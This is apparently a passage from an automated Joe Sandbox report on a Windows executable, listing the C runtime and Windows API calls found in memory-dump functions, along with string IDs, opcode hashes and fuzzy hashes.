                                                                • Instruction Fuzzy Hash: BA41E936904A119BDB176BBCEC46BDD7B69FF49360F250514F924EB292DB30C8808761
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                                                                • String ID:
                                                                • API String ID: 3264154886-0
                                                                • Opcode ID: e67b34ac76bf0795112bd2692960ae78fb7a7aa87a086531f80dcb032253361e
                                                                • Instruction ID: b531735928a76f142fd29a35e3ea7286c3f5ecd178b7fea15e4e515f91b0b39b
                                                                • Opcode Fuzzy Hash: e67b34ac76bf0795112bd2692960ae78fb7a7aa87a086531f80dcb032253361e
                                                                • Instruction Fuzzy Hash: 1F41EEB1A026129FCB12DF25D844B5AB7F8FF19311F00452AE91ACB791EB31EA14CBC1
                                                                APIs
                                                                  • Part of subcall function 0030ED48: _free.LIBCMT ref: 0030ED56
                                                                  • Part of subcall function 0031E84F: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,0031C9D2,?,00000000,00000000), ref: 0031E8FB
                                                                • GetLastError.KERNEL32 ref: 0031F40B
                                                                • __dosmaperr.LIBCMT ref: 0031F412
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0031F451
                                                                • __dosmaperr.LIBCMT ref: 0031F458
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                • String ID:
                                                                • API String ID: 167067550-0
                                                                • Opcode ID: 4f8939037826f746097833c68f661c3fe0dbfaa85157eaf3528cbd77884f3c88
                                                                • Instruction ID: 9551cd76afabe12d843ba34168133b7bda0f81da3358340b8c70ce43a00794ff
                                                                • Opcode Fuzzy Hash: 4f8939037826f746097833c68f661c3fe0dbfaa85157eaf3528cbd77884f3c88
                                                                • Instruction Fuzzy Hash: 5921D372600205AF9B2AAF668C80DEBB7ACEF0C3747158539F9699B550DB31ECC08760
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 003171C5
                                                                • _free.LIBCMT ref: 00317222
                                                                • _free.LIBCMT ref: 00317258
                                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 00317263
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_free
                                                                • String ID:
                                                                • API String ID: 2283115069-0
                                                                • Opcode ID: a3dddd33151dd7cbdc9b2e9a3cbb76f212cf8a1a415c1db4f5d4ad5ddebb882e
                                                                • Instruction ID: b36deb0daf38521f1b47ad6f6628319053d356d0528dd20f8e33a3692840c83a
                                                                • Opcode Fuzzy Hash: a3dddd33151dd7cbdc9b2e9a3cbb76f212cf8a1a415c1db4f5d4ad5ddebb882e
                                                                • Instruction Fuzzy Hash: 691191322082017BD71B2774AC82EEB25BE9BDF775B2A0B35F5209A5E2DD65CCC28115
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,?,00311657,002E2397), ref: 0031731C
                                                                • _free.LIBCMT ref: 00317379
                                                                • _free.LIBCMT ref: 003173AF
                                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00311657,002E2397), ref: 003173BA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_free
                                                                • String ID:
                                                                • API String ID: 2283115069-0
                                                                • Opcode ID: 6264765a7abee6039c857840ecd3782e4610247dbf6932e1e7c3e40ace994bea
                                                                • Instruction ID: 4152bef369722fefa9884389b8467512804be362fca7f0c3bdcc483e932d6c68
                                                                • Opcode Fuzzy Hash: 6264765a7abee6039c857840ecd3782e4610247dbf6932e1e7c3e40ace994bea
                                                                • Instruction Fuzzy Hash: 4E11A33A2082016BD71B2775AC86EEB256E97DF370B2D0B34F524DB1E1DD61CC8161A5
                                                                APIs
                                                                • GetFullPathNameW.KERNEL32(00000020,00000000,?,00000000,?,00000000,?,00325D87,?,?,?,00000020,00000001), ref: 0031A2A5
                                                                • GetLastError.KERNEL32(?,00325D87,?,?,?,00000020,00000001), ref: 0031A2AF
                                                                • __dosmaperr.LIBCMT ref: 0031A2B6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                                • String ID:
                                                                • API String ID: 2398240785-0
                                                                • Opcode ID: 0040a34cb1e2a63afe0f07ab138c1113c4bf38709aa16e476c8d3e69874edf04
                                                                • Instruction ID: d9f796504d9c711a547aa5a47f7037366626bd1ced7bb40d79edeada829b113f
                                                                • Opcode Fuzzy Hash: 0040a34cb1e2a63afe0f07ab138c1113c4bf38709aa16e476c8d3e69874edf04
                                                                • Instruction Fuzzy Hash: 2BF08631601515BB8B2A1BA6CC08DC6BF6DFF4D7A17058510F519C7420DB32D8D1D7D1
                                                                APIs
                                                                • GetFullPathNameW.KERNEL32(00000020,00000000,?,00000000,?,00000000,?,00325D12,?,?,?,?,00000020,00000001), ref: 0031A30E
                                                                • GetLastError.KERNEL32(?,00325D12,?,?,?,?,00000020,00000001), ref: 0031A318
                                                                • __dosmaperr.LIBCMT ref: 0031A31F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                                • String ID:
                                                                • API String ID: 2398240785-0
                                                                • Opcode ID: b0771fd8e249e0ec3e9cc158c3b6a261cedc5ac204974ca2953997ac285fa951
                                                                • Instruction ID: 569314bdf53725cf9ac5746509797e1625b4339ad821de99001baa6deb7d6208
                                                                • Opcode Fuzzy Hash: b0771fd8e249e0ec3e9cc158c3b6a261cedc5ac204974ca2953997ac285fa951
                                                                • Instruction Fuzzy Hash: 07F06236601515BB8B2B1F66CC089CABF6DFF483A17154911F528C7420DB31E890DBD1
                                                                APIs
                                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,003243D2,00000000,00000001,00000000,00000000,?,00317F36,?,?,00000000), ref: 00327901
                                                                • GetLastError.KERNEL32(?,003243D2,00000000,00000001,00000000,00000000,?,00317F36,?,?,00000000,?,00000000,?,00318482,?), ref: 0032790D
                                                                  • Part of subcall function 003278D3: CloseHandle.KERNEL32(FFFFFFFE,0032791D,?,003243D2,00000000,00000001,00000000,00000000,?,00317F36,?,?,00000000,?,00000000), ref: 003278E3
                                                                • ___initconout.LIBCMT ref: 0032791D
                                                                  • Part of subcall function 00327895: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,003278C4,003243BF,00000000,?,00317F36,?,?,00000000,?), ref: 003278A8
                                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,003243D2,00000000,00000001,00000000,00000000,?,00317F36,?,?,00000000,?), ref: 00327932
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                • String ID:
                                                                • API String ID: 2744216297-0
                                                                • Opcode ID: fca5dd6c89a8aadabd00152eaf74e90bd76dc23329fe836c57dfb4cb6448a644
                                                                • Instruction ID: aa012ffbfa3691176e9bd0183220ab719569c0f0c9716cfaf3cb5c741102e7a5
                                                                • Opcode Fuzzy Hash: fca5dd6c89a8aadabd00152eaf74e90bd76dc23329fe836c57dfb4cb6448a644
                                                                • Instruction Fuzzy Hash: DCF0C03A504165BBCF231FD5EC09ADA3F6AFB0A3A1F054414FA1DD9130DB729860DB91
                                                                APIs
                                                                • _free.LIBCMT ref: 00314B02
                                                                  • Part of subcall function 003185A6: HeapFree.KERNEL32(00000000,00000000,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?), ref: 003185BC
                                                                  • Part of subcall function 003185A6: GetLastError.KERNEL32(?,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?,?), ref: 003185CE
                                                                • _free.LIBCMT ref: 00314B15
                                                                • _free.LIBCMT ref: 00314B26
                                                                • _free.LIBCMT ref: 00314B37
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 57aac8b364ce4aa44279414c1da1b56f7f2d61e104627811d0a5fc915cecd34a
                                                                • Instruction ID: 989c1f1c2fb397c1e0ea79bbd02423cebab4c7709d9b486f63ec02696c5b6d48
                                                                • Opcode Fuzzy Hash: 57aac8b364ce4aa44279414c1da1b56f7f2d61e104627811d0a5fc915cecd34a
                                                                • Instruction Fuzzy Hash: BAE0BFBD8111209ACA176F15FC41AC7BA6EF78F760B02500BF4182E231DF3D65929F99
                                                                APIs
                                                                • __startOneArgErrorHandling.LIBCMT ref: 003138ED
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ErrorHandling__start
                                                                • String ID: pow
                                                                • API String ID: 3213639722-2276729525
                                                                • Opcode ID: 15322f0eeb26d6e41e346b898c67fdfc398c76a2346434e88e5688c9d124741e
                                                                • Instruction ID: fa33365e2779b1af5a591b9641a891787dcb160b8820486075d8822d33339634
                                                                • Opcode Fuzzy Hash: 15322f0eeb26d6e41e346b898c67fdfc398c76a2346434e88e5688c9d124741e
                                                                • Instruction Fuzzy Hash: 89519B61A0820196CB1F7B14CD513FE6BA8EB5C750F218D69F8D1462A8FF36CDD89A42
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: C:\Users\user\Desktop\tOuVwTJrau.exe
                                                                • API String ID: 0-2256859958
                                                                • Opcode ID: fd364bfccd795d491ffe0323d2ef94acb0577467e8d961b21e45dbbfd16d362b
                                                                • Instruction ID: f0ae12546d633442d8a9157e38fe1d4b1c916ebb0f34e644b62eee59764402d3
                                                                • Opcode Fuzzy Hash: fd364bfccd795d491ffe0323d2ef94acb0577467e8d961b21e45dbbfd16d362b
                                                                • Instruction Fuzzy Hash: 4D416071E00214AFDB2B9F9ADC81AEEFBBCEF9D310F150066F5089B251D6719A81CB50
                                                                APIs
                                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0030D4E1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: EncodePointer
                                                                • String ID: MOC$RCC
                                                                • API String ID: 2118026453-2084237596
                                                                • Opcode ID: 31d386086be478e4b1bd5eb67cda12a1c6c29f4e85dced638387a0e8dada36af
                                                                • Instruction ID: 7583c1ae89920079e68b7228e6ee942fd215f7bfd12cb122f9734ecfbcd9e0ca
                                                                • Opcode Fuzzy Hash: 31d386086be478e4b1bd5eb67cda12a1c6c29f4e85dced638387a0e8dada36af
                                                                • Instruction Fuzzy Hash: C241A971901209AFCF16DF98CC91AEEBBF5FF09308F198059F905AB291D3319A60CB65
                                                                APIs
                                                                  • Part of subcall function 0031FCAD: GetOEMCP.KERNEL32(00000000,0031FF1E,?,?,0030F4C2,0030F4C2,?), ref: 0031FCD8
                                                                • _free.LIBCMT ref: 0031FF7B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID: hf4
                                                                • API String ID: 269201875-2878765854
                                                                • Opcode ID: 25c88b214866638d9d6fed758adbbd9c8216051d5cf58775406a5eedb531913a
                                                                • Instruction ID: 4422700326f41857cd63d1a86eb6f2149fdc0ecbd1228b8635e62910a2a92f62
                                                                • Opcode Fuzzy Hash: 25c88b214866638d9d6fed758adbbd9c8216051d5cf58775406a5eedb531913a
                                                                • Instruction Fuzzy Hash: 6531B471500209AFCB16DF58D881ADE77F5FF49310F114169F8109B2A1EB719D91CB50
                                                                APIs
                                                                • __alloca_probe_16.LIBCMT ref: 00308292
                                                                • RaiseException.KERNEL32(?,?,?,?), ref: 003082B7
                                                                  • Part of subcall function 0030B446: RaiseException.KERNEL32(E06D7363,00000001,00000003,00343A84,?,?,?,00343A84), ref: 0030B4A6
                                                                  • Part of subcall function 0030E364: IsProcessorFeaturePresent.KERNEL32(00000017,0031727C,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 0030E380
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                • String ID: csm
                                                                • API String ID: 1924019822-1018135373
                                                                • Opcode ID: 0d17abdec118bd582c6343bbb7151aa2c511d34865e906f304f4394bcc62e65f
                                                                • Instruction ID: 1ede0ba545ee1d28304bbcd0b3cb6832a798e49e4469d90b64ac63370f80a543
                                                                • Opcode Fuzzy Hash: 0d17abdec118bd582c6343bbb7151aa2c511d34865e906f304f4394bcc62e65f
                                                                • Instruction Fuzzy Hash: B421CF31D026189BCF36DF95C865AEEB7B9FF41710F560809E845AB294CB30AD45CB81
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID: 0b4
                                                                • API String ID: 269201875-2908078354
                                                                • Opcode ID: c01efbd3f86124bad2aff74cffc1df9846ee38fa122d810a879642f7a2a3bf68
                                                                • Instruction ID: 965c1779ff3c62463bf9f444192b2af17d182096c91d04e6c0fd4e9c41620047
                                                                • Opcode Fuzzy Hash: c01efbd3f86124bad2aff74cffc1df9846ee38fa122d810a879642f7a2a3bf68
                                                                • Instruction Fuzzy Hash: CA118179A002005ADF2A9F29AC95BDA739DA75BB30F150627F620DE1E0DA70E8C28741
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 002E44EB
                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 002E453A
                                                                  • Part of subcall function 00308D3E: _Yarn.LIBCPMT ref: 00308D5D
                                                                  • Part of subcall function 00308D3E: _Yarn.LIBCPMT ref: 00308D81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                • String ID: bad locale name
                                                                • API String ID: 1908188788-1405518554
                                                                • Opcode ID: 01bff68bf480bf3642830fc355826f97aab6ff1cd46c9b49915cfbe34f55b45b
                                                                • Instruction ID: 1544cdc8c0c83293175a90c4106765f72b053c37875e60957ba9959f69cba90c
                                                                • Opcode Fuzzy Hash: 01bff68bf480bf3642830fc355826f97aab6ff1cd46c9b49915cfbe34f55b45b
                                                                • Instruction Fuzzy Hash: 5311C271905B849FD321CF69C901747BBF8EF19710F008A1EE49AD7B81E775A504CB95
                                                                APIs
                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00303997
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: Ios_base_dtorstd::ios_base::_
                                                                • String ID: |3$3
                                                                • API String ID: 323602529-2420565832
                                                                • Opcode ID: ed71c17977cd93cc1cfc6d7eec6a44d03a7861069928279a36c30827df576010
                                                                • Instruction ID: 238fdf8104b414b4001c730ff56c110f622da999fc2ac1cf0a3d39f4e4969be5
                                                                • Opcode Fuzzy Hash: ed71c17977cd93cc1cfc6d7eec6a44d03a7861069928279a36c30827df576010
                                                                • Instruction Fuzzy Hash: 15211A796002499FD721CF08D584F59FBE8FB49714F15869EE8089B391E771E906CBA0
                                                                APIs
                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 002E86D7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: Ios_base_dtorstd::ios_base::_
                                                                • String ID: |3$3
                                                                • API String ID: 323602529-2420565832
                                                                • Opcode ID: 38406e4abcd03a0460354a1e2f6cd007d0339999693f31270f353e22dd003efa
                                                                • Instruction ID: 58b9abcde2e69abab8630f0c79beb52a8c59d7a95fd63b1d1820ab9d39b769ba
                                                                • Opcode Fuzzy Hash: 38406e4abcd03a0460354a1e2f6cd007d0339999693f31270f353e22dd003efa
                                                                • Instruction Fuzzy Hash: BB21A378A40285CFEB22CF59C584E59BBE8FB09318F15899DE88A8B351D772E945CF40
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID: pN3
                                                                • API String ID: 269201875-2056958687
                                                                • Opcode ID: 8f21b27f4c00af122854dcf41f1b704f19e1ba18fde0407b849a86e93d6bf415
                                                                • Instruction ID: f7e989793e70022c72dcd444b7bb32b7c1dccc83c4e53fa051c39820c66cd4a2
                                                                • Opcode Fuzzy Hash: 8f21b27f4c00af122854dcf41f1b704f19e1ba18fde0407b849a86e93d6bf415
                                                                • Instruction Fuzzy Hash: 4FF0CD334092346AE7172625BD41BD77799EBD5771F25003AF40C9E143DF61588141F5
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00308CDA
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00308D35
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
